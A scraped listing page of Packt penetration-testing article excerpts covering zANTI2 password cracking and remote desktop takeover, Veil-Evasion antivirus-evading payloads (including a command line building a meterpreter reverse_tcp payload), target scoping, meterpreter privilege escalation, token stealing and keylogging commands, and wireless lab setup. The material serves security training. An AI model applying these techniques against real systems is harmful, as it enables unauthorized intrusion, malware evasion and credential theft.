like the following: E-mail address obfuscation E-mail address obfuscation scrambles any e-mail addresses on your page, then runs some JavaScript to decode it so that the text ends up being readable. This is nice in order to avoid getting spam in your user's e-mails, but the downside is that if a user has JavaScript disabled, they will not be able to read e-mail addresses: Summary In this article, we have looked at the various security features provided by CloudFlare against malicious traffic, distributed denial of service, e-mail address obfuscation, and so on. Therefore, it can be concluded that CloudFlare is one of the better website-designing options available in the market today. Resources for Article: Further resources on this subject: Getting Started with RapidWeaver [Article] LESS CSS Preprocessor [Article] Translations in Drupal 6 [Article]
Read more
  • 0
  • 0
  • 10964

article-image-connecting-open-ports
Packt
31 Aug 2015
6 min read
Save for later

Connecting to Open Ports

Packt
31 Aug 2015
6 min read
 Miroslav Vitula, the author of the book Learning zANTI2 for Android Pentesting, penned this article on Connecting to Open Ports, focusing on cracking passwords and setting up a remote desktop connection. Let's delve into the topics. (For more resources related to this topic, see here.) Cracking passwords THC Hydra is one of the best-known login crackers, supports numerous protocols, is flexible, and very fast. Hydra supports more than 30 protocols, including HTTP GET, HTTP HEAD, Oracle, pcAnywhere, rlogin, Telnet, SSH (v1 and v2 as well), and many, many more. As you might guess, THC Hydra is also implemented in zANTI2 and it eventually becomes an integral part of the app for its high functionality and usability. The zANTI2 developers named this section Password Complexity Audit and it is located under Attack Actions after a target is selected: After selecting this option, you've probably noticed there are several types of attack. First, there are multiple dictionaries: Small, Optimized, Big, and a Huge dictionary that contains the highest amount of usernames and passwords. To clarify, a dictionary attack is a method of breaking into a password-protected computer, service, or server by entering every word in a dictionary file as a username/password. Unlike a brute force attack, where any possible combinations are tried, a dictionary attack uses only those possibilities that are deemed most likely to succeed. Files used for dictionary attacks (also called wordlists) can be found anywhere on the Internet, starting from basic ones to huge ones containing more than 900,000,000 words for WPA2 WiFi cracking. zANTI2 also lets you use a custom wordlist for the attack: Apart from dictionary attacks, there is an Incremental option, which is used for brute force attacks. This attempts to guess the right combination using a custom range of letters/numbers: To set up the method properly, ensure the cracking options are correctly set. The area of searched combinations is defined by min-max charset, where min stands for minimum length of the password, max for maximum length, and charset for character set, which in our case will be defined as lowercase letters. The Automatic Mode, as the description says, automatically matches the list of protocols with the open ports on the target. To select a custom protocol manually, simply disable the Automatic Mode and select the protocol you want to perform the attack on: In our case that would be the SSH protocol for cracking a password used to establish the connection on port 22. Since incremental is a brute force method, this might take an extremely long time to find the right combination. For instance, the password zANTI2-hacks would take about 350 thousand years for a desktop PC to crack; there are 77 character combinations and 43 sextillion possible combinations. Therefore, it is generally better to use dictionary attacks for cracking passwords that might be longer than just a few characters. However, if you have a few thousand years to spare, feel free to use the brute force method. If everything went fine, you should now be able to view the access password with the username. You can easily connect to the target by tapping the finished result using one of the installed SSH clients: When connected, it's all yours. All Linux commands can be executed using the app and you now have the power to list directories, change the password, and more. Although connecting to port 22 might sound spicy, there is more to be discovered. A remote desktop connection Microsoft has made a handy feature called remote desktop. As the title suggests, this lets an ordinary user access his home computer when he is away, or be used for managing a server through a network. This is a great sign that we can intercept this connection and exploit an open port to set up a remote desktop connection between our mobile phone and a target. There is, however, one requirement. Since the RDP (Remote Desktop Protocol) port 3389 isn't open by default, a user has to allow connections from other computers. This option can be set in the control panel of Windows, and only then is port 3389 accessible. If the option Allow remote connections to this computer is ticked on the victim's machine, we're good to go. This will leave the 3389 port open and listening for incoming broadcasts, including the ones from malicious attackers. If we run a quick port discovery on the target, the remote desktop port with number 3389 will pop up. This is a good sign for us, indicating that this port is open and listening: Tap the port (ms-wbt-server). You will be asked for login credentials once again. Tap GO. Now, if you haven't got any remote desktop clients installed, zANTI2 will redirect you to Google Play to download one—the Parallels 2X RDP. This application, as you can tell, is capable of establishing remote desktop access from your Android device. It is stable, fast, and works very well. After downloading the application, go back to zANTI2 and connect to the port once again. You will now be redirected directly to the app and a connection will be established immediately. As you can see in the following screenshot, here's my computer—I'm currently working on the article! Apart from a simplified Windows user interface (using a basic XP look with no transparent bars and such), it is basically the same and you can take control over the whole system. The Parallels 2X RDP client offers a comfortable and easy way to move the mouse and use the keyboard. However, while connecting to port 445 a victim has no idea about an intruder accessing the files on his computer; connecting to this port will log the current user out from the current session. However, if the remote desktop is set to allow multiple sessions at once, it is possible for a victim to see what the attacker currently controls. The quality seems to be good, although the resolution  is only 804 x 496 pixels 32-bit color depth. Despite these conditions, it is still easy to access folders, view files, or open applications. As we can see in the practical demonstration, service ports should be accessible only by the authorized systems, not by anyone else. It is also a good way to teach you to secure login credentials on your machine to protect yourself not only from people behind your back but also mainly from people on the network. Summary In this article, we showed how a connection to these ports is established, how to crack password-protected ports, and how to access them afterwards using tools like ConnectBot or the remote desktop client. Resources for Article: Further resources on this subject: Saying Hello to Unity and Android[article] Speeding up Gradle builds for Android[article] Android and UDOO for Home Automation [article]
Read more
  • 0
  • 0
  • 10925
article-image-veil-evasion
Packt
18 Jun 2014
6 min read
Save for later

Veil-Evasion

Packt
18 Jun 2014
6 min read
(For more resources related to this topic, see here.) A new AV-evasion framework, written by Chris Truncer, called Veil-Evasion (www.Veil-Evasion.com), is now providing effective protection against the detection of standalone exploits. Veil-Evasion aggregates various shellcode injection techniques into a framework that simplifies management. As a framework, Veil-Evasion possesses several features, which includes the following: It incorporates custom shellcode in a variety of programming languages, including C, C#, and Python It can use Metasploit-generated shellcode It can integrate third-party tools such as Hyperion (encrypts an EXE file with AES-128 bit encryption), PEScrambler, and BackDoor Factory The Veil-Evasion_evasion.cna script allows for Veil-Evasion to be integrated into Armitage and its commercial version, Cobalt Strike Payloads can be generated and seamlessly substituted into all PsExec calls Users have the ability to reuse shellcode or implement their own encryption methods It's functionality can be scripted to automate deployment Veil-Evasion is under constant development and the framework has been extended with modules such as Veil-Evasion-Catapult (the payload delivery system) Veil-Evasion can generate an exploit payload; the standalone payloads include the following options: Minimal Python installation to invoke shellcode; it uploads a minimal Python.zip installation and the 7zip binary. The Python environment is unzipped, invoking the shellcode. Since the only files that interact with the victim are trusted Python libraries and the interpreter, the victim's AV does not detect or alarm on any unusual activity. Sethc backdoor, which configures the victim's registry to launch the sticky keys RDP backdoor. PowerShell shellcode injector. When the payloads have been created, they can be delivered to the target in one of the following two ways: Upload and execute using Impacket and PTH toolkit UNC invocation Veil-Evasion is available from the Kali repositories, such as Veil-Evasion, and it is automatically installed by simply entering apt-get install veil-evasion in a command prompt. If you receive any errors during installation, re-run the /usr/share/veil-evasion/setup/setup.sh script. Veil-Evasion presents the user with the main menu, which provides the number of payload modules that are loaded as well as the available commands. Typing list will list all available payloads, list langs will list the available language payloads, and list <language> will list the payloads for a specific language. Veil-Evasion's initial launch screen is shown in the following screenshot: Veil-Evasion is undergoing rapid development with significant releases on a monthly basis and important upgrades occurring more frequently. Presently, there are 24 payloads designed to bypass antivirus by employing encryption or direct injection into the memory space. These payloads are shown in the next screenshot: To obtain information on a specific payload, type info<payload number / payload name> or info <tab> to autocomplete the payloads that are available. You can also just enter the number from the list. In the following example, we entered 19 to select the python/shellcode_inject/aes_encrypt payload: The exploit includes an expire_payload option. If the module is not executed by the target user within a specified timeframe, it is rendered inoperable. This function contributes to the stealthiness of the attack. The required options include the name of the options as well as the default values and descriptions. If a required value isn't completed by default, the tester will need to input a value before the payload can be generated. To set the value for an option, enter set <option name> and then type the desired value. To accept the default options and create the exploit, type generate in the command prompt. If the payload uses shellcode, you will be presented with the shellcode menu, where you can select msfvenom (the default shellcode) or a custom shellcode. If the custom shellcode option is selected, enter the shellcode in the form of x01x02, without quotes and newlines (n). If the default msfvenom is selected, you will be prompted with the default payload choice of windows/meterpreter/reverse_tcp. If you wish to use another payload, press Tab to complete the available payloads. The available payloads are shown in the following screenshot: In the following example, the [tab] command was used to demonstrate some of the available payloads; however, the default (windows/meterpreter/reverse_tcp) was selected, as shown in the following screenshot: The user will then be presented with the output menu with a prompt to choose the base name for the generated payload files. If the payload was Python-based and you selected compile_to_exe as an option, the user will have the option of either using Pyinstaller to create the EXE file, or generating Py2Exe files, as shown in the following screenshot: The final screen displays information on the generated payload, as shown in the following screenshot: The exploit could also have been created directly from a command line using the following options: kali@linux:~./Veil-Evasion.py -p python/shellcode_inject/aes_encrypt -o -output --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.43.134 LPORT=4444 Once an exploit has been created, the tester should verify the payload against VirusTotal to ensure that it will not trigger an alert when it is placed on the target system. If the payload sample is submitted directly to VirusTotal and it's behavior flags it as malicious software, then a signature update against the submission can be released by antivirus (AV) vendors in as little as one hour. This is why users are clearly admonished with the message "don't submit samples to any online scanner!" Veil-Evasion allows testers to use a safe check against VirusTotal. When any payload is created, a SHA1 hash is created and added to hashes.txt, located in the ~/veil-output directory. Testers can invoke the checkvt script to submit the hashes to VirusTotal, which will check the SHA1 hash values against its malware database. If a Veil-Evasion payload triggers a match, then the tester knows that it may be detected by the target system. If it does not trigger a match, then the exploit payload will bypass the antivirus software. A successful lookup (not detectable by AV) using the checkvt command is shown as follows: Testing, thus far supports the finding that if checkvt does not find a match on VirusTotal, the payload will not be detected by the target's antivirus software. To use with the Metasploit Framework, use exploit/multi/handler and set PAYLOAD to be windows/meterpreter/reverse_tcp (the same as the Veil-Evasion payload option), with the same LHOST and LPORT used with Veil-Evasion as well. When the listener is functional, send the exploit to the target system. When the listeners launch it, it will establish a reverse shell back to the attacker's system. Summary Kali provides several tools to facilitate the development, selection, and activation of exploits, including the internal exploit-db database as well as several frameworks that simplify the use and management of the exploits. Among these frameworks, the Metasploit Framework and Armitage are particularly important; however, Veil-Evasion enhances both with its ability to bypass antivirus detection. Resources for Article: Further resources on this subject: Kali Linux – Wireless Attacks [Article] Web app penetration testing in Kali [Article] Customizing a Linux kernel [Article]
Read more
  • 0
  • 0
  • 10855

article-image-backtrack-4-target-scoping
Packt
15 Apr 2011
9 min read
Save for later

BackTrack 4: Target scoping

Packt
15 Apr 2011
9 min read
What is target scoping? Target Scoping is defined as an empirical process for gathering target assessment requirements and characterizing each of its parameters to generate a test plan, limitations, business objectives, and time schedule. This process plays an important role in defining clear objectives towards any kind of security assessment. By determining these key objectives one can easily draw a practical roadmap of what will be tested, how it should be tested, what resources will be allocated, what limitations will be applied, what business objectives will be achieved, and how the test project will be planned and scheduled. Thus, we have combined all of these elements and presented them in a formalized scope process to achieve the required goal. Following are the key concepts which will be discussed in this article: Gathering client requirements deals with accumulating information about the target environment through verbal or written communication. Preparing test plan depends on different sets of variables. These may include shaping the actual requirements into structured testing process, legal agreements, cost analysis, and resource allocation. Profiling test boundaries determines the limitations associated with the penetration testing assignment. These can be a limitation of technology, knowledge, or a formal restriction on the client's IT environment. Defining business objectives is a process of aligning business view with technical objectives of the penetration testing program. Project management and scheduling directs every other step of the penetration testing process with a proper timeline for test execution. This can be achieved by using a number of advanced project management tools. It is highly recommended to follow the scope process in order to ensure test consistency and greater probability of success. Additionally, this process can also be adjusted according to the given situation and test factors. Without using any such process, there will be a greater chance of failure, as the requirements gathered will have no proper definitions and procedures to follow. This can lead the whole penetration testing project into danger and may result in unexpected business interruption. Paying special attention at this stage to the penetration testing process would make an excellent contribution towards the rest of the test phases and clear the perspectives of both technical and management areas. The key is to acquire as much information beforehand as possible from the client to formulate a strategic path that reflects multiple aspects of penetration testing. These may include negotiable legal terms, contractual agreement, resource allocation, test limitations, core competencies, infrastructure information, timescales, and rules of engagement. As a part of best practices, the scope process addresses each of the attributes necessary to kickstart our penetration testing project in a professional manner. As we can see in the preceding screenshot, each step constitutes unique information that is aligned in a logical order to pursue the test execution successfully. Remember, the more information that is gathered and managed properly, the easier it will be for both the client and the penetration testing consultant to further understand the process of testing. This also governs any legal matters to be resolved at an early stage. Hence, we will explain each of these steps in more detail in the following section. Gathering client requirements This step provides a generic guideline that can be drawn in the form of a questionnaire to devise all information about target infrastructure from a client. A client can be any subject who is legally and commercially bounded to the target organization. Such that, it is critical for the success of the penetration testing project to identify all internal and external stakeholders at an early stage of a project and analyze their levels of interest, expectations, importance, and influence. A strategy can then be developed for approaching each stakeholder with their requirements and involvement in the penetration testing project to maximize positive influences and mitigate potential negative impacts. It is solely the duty of the penetration tester to verify the identity of the contracting party before taking any further steps. The basic purpose of gathering client requirements is to open a true and authentic channel by which the pentester can obtain any information that may be necessary for the testing process. Once the test requirements have been identified, they should be validated by a client in order to remove any misleading information. This will ensure that the developed test plan is consistent and complete. We have listed some of the commonly asked questions that can be used in a conventional customer requirements form and the deliverables assessment form. It is important to note that this list can be extended or shortened according to the goal of a client and that the client must retain enough knowledge about the target environment. Customer requirements form Collecting company's information such as company name, address, website, contact person details, e-mail address, and telephone number. What are your key objectives behind the penetration testing project? Determining the penetration test type (with or without specific criteria): Black-box testing or external testing White-box testing or internal testing Informed testing Uninformed testing Social engineering included Social engineering excluded Investigate employees background information Adopt employee's fake identity Denial of Service included Denial of Service excluded Penetrate business partner systems How many servers, workstations, and network devices need to be tested? What operating system technologies are supported by your infrastructure? Which network devices need to be tested? Firewalls, routers, switches, modems, load balancers, IDS, IPS, or any other appliance? Is there any disaster recovery plan in place? If yes, who is managing it? Are there any security administrators currently managing your network? Is there any specific requirement to comply with industry standards? If yes, please list them. Who will be the point of contact for this project? What is the timeline allocated for this project? In weeks or days. What is your budget for this project? List any other requirements as necessary. Deliverables assessment form What types of reports are expected? Executive reports Technical assessment reports Developer reports In which format do you want the report to be delivered? PDF, HTML, or DOC. How should the report be submitted? E-mail or printed. Who is responsible for receiving these reports? Employee Shareholder Stakeholder By using such a concise and comprehensive inquiry form, you can easily extract the customer requirements and fulfill the test plan accordingly. Preparing the test plan As the requirements have been gathered and verified by a client, it is now time to draw a formal test plan that should reflect all of these requirements, in addition to other necessary information on legal and commercial grounds of the testing process. The key variables involved in preparing a test plan are a structured testing process, resource allocation, cost analysis, non-disclosure agreement, penetration testing contract, and rules of engagement. Each of these areas will be addressed with their short descriptions below: Structured testing process: After analyzing the details provided by our customer, it may be important to re-structure the BackTrack testing methodology. For instance, if the social engineering service was excluded then we would have to remove it from our formal testing process. This practice is sometimes known as Test Process Validation. It is a repetitive task that has to be visited whenever there is a change in client requirements. If there are any unnecessary steps involved during the test execution then it may result in a violation of the organization's policies and incur serious penalties. Additionally, based on the test type there would be a number of changes to the test process. Such that, white-box testing does not require information gathering and target discovery phase because the auditor is already aware of the internal infrastructure. Resource allocation: Determining the expertise knowledge required to achieve completeness of a test is one of the substantial areas. Thus, assigning a skilled penetration tester for a certain task may result in better security assessment. For instance, an application penetration testing requires a dedicated application security tester. This activity plays a significant role in the success of penetration testing assignment. Cost analysis: The cost for penetration testing depends on several factors. This may involve the number of days allocated to fulfill the scope of a project, additional service requirements such as social engineering and physical security assessment, and the expertise knowledge required to assess the specific technology. From the industry viewpoint, this should combine a qualitative and quantitative value. Non-disclosure Agreement (NDA): Before starting the test process it is necessary to sign the agreement which may reflect the interests of both parties "client" and "penetration tester". Using such a mutual non-disclosure agreement should clear the terms and conditions under which the test should be aligned. It is important for the penetration tester to comply with these terms throughout the test process. Violating any single term of agreement can result in serious penalties or permanent exemption from the job. Penetration testing contract: There is always a need for a legal contract which will reflect all the technical matters between the "client" and "penetration tester". This is where the penetration testing contract comes in. The basic information inside such contracts focus on what testing services are being offered, what their main objectives are, how they will be conducted, payment declaration, and maintaining the confidentiality of a whole project. Rules of engagement: The process of penetration testing can be invasive and requires clear understanding of what the assessment demands, what support will be provided by the client, and what type of potential impact or effect each assessment technique may have. Moreover, the tools used in the penetration testing processes should clearly state their purpose so that the tester can use them accordingly. The rules of engagement define all of these statements in a more detailed fashion to address the necessity of technical criteria that should be followed during the test execution. By preparing each of these subparts of the test plan, you can ensure the consistent view of a penetration testing process. This will provide a penetration tester with more specific assessment details that has been processed from the client requirements. It is always recommended to prepare a test plan checklist which can be used to verify the assessmnt criteria and its underlying terms with the contracting party.
Read more
  • 0
  • 0
  • 10758

article-image-so-what-metasploit
Packt
06 Aug 2013
9 min read
Save for later

So, what is Metasploit?

Packt
06 Aug 2013
9 min read
(For more resources related to this topic, see here.) In the IT industry, we have various flavors of operating systems ranging from Mac, Windows, *nix platforms, and other server operating systems, which run an n number of services depending on the needs of the organization. When given a task to assess the risk factor of any organization, it becomes very tedious to run single code snippets against these systems. What if, due to some hardware failure, all these code snippets are lost? Enter Metasploit. Metasploit is an exploit development framework started by H. D. Moore in 2003, which was later acquired by Rapid7. It is basically a tool for the development of exploits and the testing of these exploits on live targets. This framework has been completely written using Ruby,and is currently one of the largest frameworks ever written in the Ruby language. The tool houses more than 800 exploits in its repository and hundreds of payloads for each exploit. This also contains various encoders, which help us in the obfuscation of exploits to evade the antivirus and other intrusion detection systems ( IDS ). As we progress in this book, we shall uncover more and more features of this tool. This tool can be used for penetration testing, risk assessment, vulnerability research, and other security developmental practices such as IDS and the intrusion prevention system ( IPS ). Top features you need to know about After learning about the basics of the Metasploit framework, in this article we will find out the top features of Metasploit and learn some of the attack scenarios. This article will be a flow of the following features: The meterpreter module Using auxiliary modules in Metasploit Client-side attacks with auxiliary modules The meterpreter module In the earlier article, we have seen how to open up a meterpreter session in Metasploit. But in this article, we shall see the features of the meterpreter module and its command set in detail. Before we see the working example, let's see why meterpreter is used in exploitation: It doesn't create a new process in the target system It runs in the context of the process that is being exploited It performs multiple tasks in one go; that is, you don't have to create separate requests for each individual task It supports scripts writing Let's check out what the meterpreter shell looks like. Meterpreter allows you to provide commands and obtain results. Let's see the list of commands that are available to use under meterpreter. These can be obtained by typing help in the meterpreter command shell. The syntax for this command is as follows: meterpreter>help The following screenshot represents the core commands: The filesystem commands are as follows: The networking commands are as follows: The system commands are as follows: The user interface commands are as follows: The other miscellaneous commands are as follows: As you can see in the preceding screenshots, meterpreter has two sets of commands set apart from its core set of commands. They are as follows: Stdapi Priv The Stdapi command set contains various commands for the filesystem commands, networking commands, system commands, and user-interface commands. Depending on the exploit, if it can get higher privileges, the priv command set is loaded. By default, the stdapi command set and core command set gets loaded irrespective of the privilege an exploit gets. Let's check out the route command from the meterpreter stdapi command set. The syntax is as follows: meterpreter>route [–h] command [args] In the following screenshot, we can see the list of all the routes on the target machine: In a scenario where we wish to add other subnets and gateways we can use the concept of pivoting, where we add a couple of routes for optimizing the attack. The following are the commands supported by the route: Add [subnet] [netmask] [gateway]Delete [subnet] [netmask] [gateway] List Another command that helps during pivoting is port-forwarding. Meterpreter supports port forwarding via the following command. The syntax for this command is as follows: meterpreter>portfwd [-h] [add/delete/list] [args] As soon as an attacker breaks into any system, the first thing that he/she does is check what privilege levels he/she has to access the system. Meterpreter provides a command for working out the privilege level after breaking into the system. The syntax for this command is as follows: meterpreter>getuid The following screenshot demonstrates the working of getuid in meterpreter. In the following screenshot, the attacker is accessing the system with the SYSTEM privilege. In a Windows environment, the SYSTEM privilege is the highest possible privilege available. Suppose we failed to get access to the system as a SYSTEM user, but succeeded in getting access via the administrator, then meterpreter provides you with many ways to elevate your access levels. This is called privilege escalation. The commands are as follows: Syntax: meterpreter>getsystem Syntax: meterpreter>migrate process_id Syntax: meterpreter>steal_token process_id The first method uses an internal procedure within the meterpreter to gain the system access, whereas in the second method, we are migrating to a process that is running with a SYSTEM privilege. In this case, the exploit by default gets loaded in any process space of the Windows operating system. But, there is always a possibility that the user clears that process space by deleting that process from the process manager. In a case like this, it's wise to migrate to a process which is usually untouched by the user. This helps in maintaining a prolonged access to the victim machine. In the third method, we are actually impersonating a process which is running as a SYSTEM privileged process. This is called impersonation via token stealing. Basically, Windows assigns users with a unique ID called Secure Identifier (SID). Each thread holds a token containing information about the privilege levels. Impersonating a token happens when one particular thread temporarily assumes the identity of another process in the same system. We have seen the usage of process IDs in the preceding commands, but how do we fetch the process ID? That is exactly what we I shall be covering in this article. Windows runs various processes and the exploit itself will be running in the process space of the Windows system. To list all these processes with their PIDs and the privilege levels, we use the following meterpreter command: meterpreter>ps The following screenshot gives a clear picture of the ps command: In the preceding screenshot, we have the PIDs listed. We can use these PIDs to escalate our privileges. Once you steal a token, it can be dropped using the Drop_token command. The syntax for this command is as follows: meterpreter>drop_token Another interesting command from the stdapi set is the shell command. This spawns a shell in the target system and enables us to navigate through the system effortlessly. The syntax for this command is as follows: meterpreter>shell The following screenshot shows the usage of the shell command: The preceding screenshot shows that we are inside the target system. All the usual windows command shell scripts such as dir, cd, and md work here. After briefly covering system commands, let's start learning the filesystem commands. A filesystem contains a working directory. To find out the current working directory in the target system, we use the following command: meterpreter>pwd The following screenshot shows the command in action: Suppose you wish to search for different files on the target system, then we can use a command called search. The syntax for this command is as follows: meterpreter> search [-d dir][-r recurse] –f pattern Various options available under the search command are: -d: This is the directory to begin the search. If nothing is specified, then it searches all drives. -f: The pattern that we would like to search for. For example, *.pdf. -h: Provides the help context. -r: Used when we need to recursively search the subdirectories. By default this is set to true. Once we get the file we need, we use the download command to download it to our drive. The syntax for this command is as follows: meterpreter>download Full_relative_path By now we have covered the core commands, system commands, networking commands, and filesystem commands. The last article of the stdapi command set is the user-interface commands. The most commonly used commands are the keylogging commands. These commands are very effective in sniffing user account credentials: Syntax: meterpreter>keyscan_start Syntax: meterpreter>keyscan_dump Syntax: meterpreter>keyscan_stop This is the procedure of the usage of this command. The following screenshot explains the commands in action: The communication between the meterpreter and its targets is done via type-length-value. This means that the data is getting transferred in an encrypted manner. This leads to multiple channels of communications. The advantage of this is that multiple programs can communicate with an attacker. The creation of channels is illustrated in the following screenshot: The syntax for this command is as follows: meterpreter>execute process_name –c -c is the parameter that tells the meterpreter to channel the input/output. When the attack requires us to interact with multiple processes then the concept of channels comes in handy as a tool for the attacker. The close command is used to exit a channel. Summary In this article we learned what is Metaspoilt and also saw one of its top feature. Resources for Article: Further resources on this subject: Understanding the True Security Posture of the Network Environment being Tested [Article] Preventing Remote File Includes Attack on your Joomla Websites [Article] Tips and Tricks on BackTrack 4 [Article]
Read more
  • 0
  • 0
  • 10729
article-image-cissp-security-measures-access-control
Packt
27 Nov 2009
4 min read
Save for later

CISSP: Security Measures for Access Control

Packt
27 Nov 2009
4 min read
Knowledge requirements A candidate appearing for the CISSP exam should have knowledge in the following areas that relate to access control: Control access by applying concepts, methodologies, and techniques Identify, evaluate, and respond to access control attacks such as Brute force attack, dictionary, spoofing, denial of service, etc. Design, coordinate, and evaluate penetration test(s) Design, coordinate, and evaluate vulnerability test(s) The approach In accordance with the knowledge expected in the CISSP exam, this domain is broadly grouped under five sections as shown in the following diagram: Section 1: The Access Control domain consists of many concepts, methodologies, and some specific techniques that are used as best practices. This section coverssome of the basic concepts, access control models, and a few examples of access control techniques. Section 2: Authentication processes are critical for controlling access to facilities and systems. This section looks into important concepts that establish the relationship between access control mechanisms and authentication processes. Section 3: A system or facility becomes compromised primarily through unauthorized access either through the front door or the back door. We'll see some of the common and popular attacks on access control mechanisms, and also learn about the prevalent countermeasures to such attacks. Section 4: An IT system consists of an operating system software, applications, and embedded software in the devices to name a few. Vulnerabilities in such software are nothing but holes or errors. In this section we see some of the common vulnerabilities in IT systems, vulnerability assessment techniques, and vulnerability management principles. Section 5: Vulnerabilities are exploitable, in the sense that the IT systems can be compromised and unauthorized access can be gained by exploiting the vulnerabilities. Penetration testing or ethical hacking is an activity that tests the exploitability of vulnerabilities for gaining unauthorized access to an IT system. Today, we'll quickly review some of the important concepts in the Sections 1, 2,and 3. Access control concepts, methodologies, and techniques Controlling access to the information systems and the information processing facilities by means of administrative, physical, and technical safeguards is the primary goal of access control domain. Following topics provide insight into someof the important access control related concepts, methodologies, and techniques. Basic concepts One of the primary concepts in access control is to understand the subject and the object. A subject may be a person, a process, or a technology component that either seeks access or controls the access. For example, an employee trying to access his business email account is a subject. Similarly, the system that verifies the credentials such as username and password is also termed as a subject. An object can be a file, data, physical equipment, or premises which need controlled access. For example, the email stored in the mailbox is an object that a subject is trying to access. Controlling access to an object by a subject is the core requirement of an access control process and its associated mechanisms. In a nutshell, a subject either seeks or controls access to an object. An access control mechanism can be classified broadly into the following two types: If access to an object is controlled based on certain contextual parameters, such as location, time, sequence of responses, access history, and so on, then it is known as a context-dependent access control. In this type of control, the value of the asset being accessed is not a primary consideration. Providing the username and password combination followed by a challenge and response mechanism such as CAPTCHA, filtering the access based on MAC adresses in wireless connections, or a firewall filtering the data based on packet analysis are all examples of context-dependent access control mechanisms. Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a challenge-response test to ensure that the input to an access control system is supplied by humans and not by machines. This mechanism is predominantly used by web sites to prevent Web Robots(WebBots) to access the controlled section of the web site by brute force methods The following is an example of CAPTCHA: If the access is provided based on the attributes or content of an object,then it is known as a content-dependent access control. In this type of control, the value and attributes of the content that is being accessed determines the control requirements. For example, hiding or showing menus in an application, views in databases, and access to confidential information are all content-dependent.
Read more
  • 0
  • 0
  • 10505

article-image-wireless-and-mobile-hacks
Packt
22 Jul 2014
6 min read
Save for later

Wireless and Mobile Hacks

Packt
22 Jul 2014
6 min read
(For more resources related to this topic, see here.) So I don't think it's possible to go to a conference these days and not see a talk on mobile or wireless. (They tend to schedule the streams to have both mobile and wireless talks at the same time—the sneaky devils. There is no escaping the wireless knowledge!) So, it makes sense that we work out some ways of training people how to skill up on these technologies. We're going to touch on some older vulnerabilities that you don't see very often, but as always, when you do, it's good to know how to insta-win. Wireless environment setup This article is a bit of an odd one, because with Wi-Fi and mobile, it's much harder to create a safe environment for your testers to work in. For infrastructure and web app tests, you can simply say, "it's on the network, yo" and they'll get the picture. However, Wi-Fi and mobile devices are almost everywhere in places that require pen testing. It's far too easy for someone to get confused and attempt to pwn a random bystander. While this sounds hilarious, it is a serious issue if that occurs. So, adhere to the following guidelines for safer testing: Where possible, try and test away from other people and networks. If there is an underground location nearby, testing becomes simpler as floors are more effective than walls for blocking Wi-Fi signals (contrary to the firmly held beliefs of anyone who's tried to improve their home network signal). If you're an individual who works for a company, or you know, has the money to make a Faraday cage, then by all means do the setup in there. I'll just sit here and be jealous. Unless it's pertinent to the test scenario, provide testers with enough knowledge to identify the devices and networks they should be attacking. A good way to go is to provide the Mac address as they very rarely collide. (Mac randomizing tools be damned.) If an evil network has to be created, name it something obvious and reduce the access to ensure that it is visible to as few people as possible. The naming convention we use is Connectingtomewillresultin followed by pain, death, and suffering. While this steers away the majority of people, it does appear to attract the occasional fool, but that's natural selection for you. Once again, but it is worth repeating, don't use your home network. Especially in this case, using your home equipment could expose you to random passersby or evil neighbors. I'm pretty sure my neighbor doesn't know how to hack, but if he does, I'm in for a world of hurt. Software We'll be using Kali Linux as the base for this article as we'll be using the tools provided by Kali to set up our networks for attack. Everything you need is built into Kali, but if you happen to be using another build such as Ubuntu or Debian, you will need the following tools: Iwtools (apt-get install iw): This is the wireless equivalent of ifconfig that allows the alteration of wireless adapters, and provides a handy method to monitor them. Aircrack suite (apt-get install aircrack-ng): The basic tools of wireless attacking are available in the Aircrack suite. This selection of tools provides a wide range of services, including cracking encryption keys, monitoring probe requests, and hosting rogue networks. Hostapd (apt-get install hostapd): Airbase-ng doesn't support WPA-2 networks, so we need to bring in the serious programs for serious people. This can also be used to host WEP networks, but getting Aircrack suite practice is not to be sniffed at. Wireshark (apt-get install wireshark): Wireshark is one of the most widely used network analytics tools. It's not only used by pen testers, but also by people who have CISSP and other important letters after their names. This means that it's a tool that you should know about. dnschef (https://thesprawl.org/projects/dnschef/): Thanks to Duncan Winfrey, who pointed me in this direction. DNSchef is a fantastic resource for doing DNS spoofing. Other alternatives include DNS spoof and Metasploit's Fake DNS. Crunch (apt-get install crunch): Crunch generates strings in a specified order. While it seems very simple, it's incredibly useful. Use with care though; it has filled more than one unwitting user's hard drive. Hardware You want to host a dodgy network. The first question to ask yourself, after the question you already asked yourself about software, is: is your laptop/PC capable of hosting a network? If your adapter is compatible with injection drivers, you should be fine. A quick check is to boot up Kali Linux and run sudo airmon-ng start <interface>. This will put your adapter in promiscuous mode. If you don't have the correct drivers, it'll throw an error. Refer to a potted list of compatible adapters at http://www.aircrack-ng.org/doku.php?id=compatibility_drivers. However, if you don't have access to an adapter with the required drivers, fear not. It is still possible to set up some of the scenarios. There are two options. The first and most obvious is "buy an adapter." I can understand that you might not have a lot of cash kicking around, so my advice is to pick up an Edimax ew-7711-UAN—it's really cheap and pretty compact. It has a short range and is fairly low powered. It is also compatible with Raspberry Pi and BeagleBone, which is awesome but irrelevant. The second option is a limited solution. Most phones on the market can be used as wireless hotspots and so can be used to set up profiles for other devices for the phone-related scenarios in this article. Unfortunately, unless you have a rare and epic phone, it's unlikely to support WEP, so that's out of the question. There are solutions for rooted phones, but I wouldn't instruct you to root your phone, and I'm most certainly not providing a guide to do so. Realistically, in order to create spoofed networks effectively and set up these scenarios, a computer is required. Maybe I'm just not being imaginative enough.
Read more
  • 0
  • 0
  • 10385
Modal Close icon
Modal Close icon